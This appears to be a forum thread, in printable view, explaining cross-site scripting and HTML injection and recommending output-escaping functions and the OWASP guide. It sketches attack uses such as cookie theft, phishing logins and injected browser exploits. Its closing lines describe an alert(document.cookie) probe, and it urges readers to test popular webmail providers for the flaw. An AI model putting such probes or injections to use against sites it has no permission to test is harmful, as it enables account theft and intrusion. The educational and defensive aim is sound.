What The Hek is This Vulneability Abt.
Printable View
What The Hek is This Vulneability Abt.
The article that el-half posted is an excellent introduction to XSS, and you should read it. It's not the whole story, though. First of all, their countermeasures section is a little skimpy. For instance, they fail to mention that most scripting languages have commands to clean up input so that you can't have any html junk from users. For instance, in PHP, the function is called htmlspecialchars(). In ASP, it's server.htmlencod().
The article also fails to even touch on HTML injection, which is related. In many web applications — usually crappy bulletin board systems — you can inject HTML into the database, such that you can rewrite the web page that other users see. Attackers have used this in the past to tweak the noses of corporations by making their web sites say bad things about them. A more sinister possibility is to inject HTML to download a browser exploit, so that, for instance, anyone visiting a particular site using Win IE finds that the attacker now 0wn3z their computer. Fortunately, HTML injection is pretty easy to avoid, it's just a matter of calling the same functions you would use to prevent XSS.
Finally, I cannot say enough good things about the Open Web Applications Security Project Guide. It contains loads of clear information about writing secure web applications, including info on XSS.
Cross Site Scripting is a vulnerability used to insert code into places it shouldn't be (+/-)...
As you can imagine this is used in the wrong way by the wrong ppl.
A common example is the creation of a falsebank website and then XSS the login part to mail the hacker your data. This as happened before. It can also be used to steal cookies and other stuff.
If you want to learn more i suggest you read this. On info on how to avoid these kind of attacks, check this out.
Note: if you use hotmail/yahoo and some other popular email providers i suggest u check them for this vul. Those i mentioned were vulnerable last year, but they have probably done something about it by now.
From what i understand a simple javascript can be placed in the page that will display cookie. JAVASCRIPT ALERT - "document.cookie"
You just make a a java alert and place "document.cookie" as the body.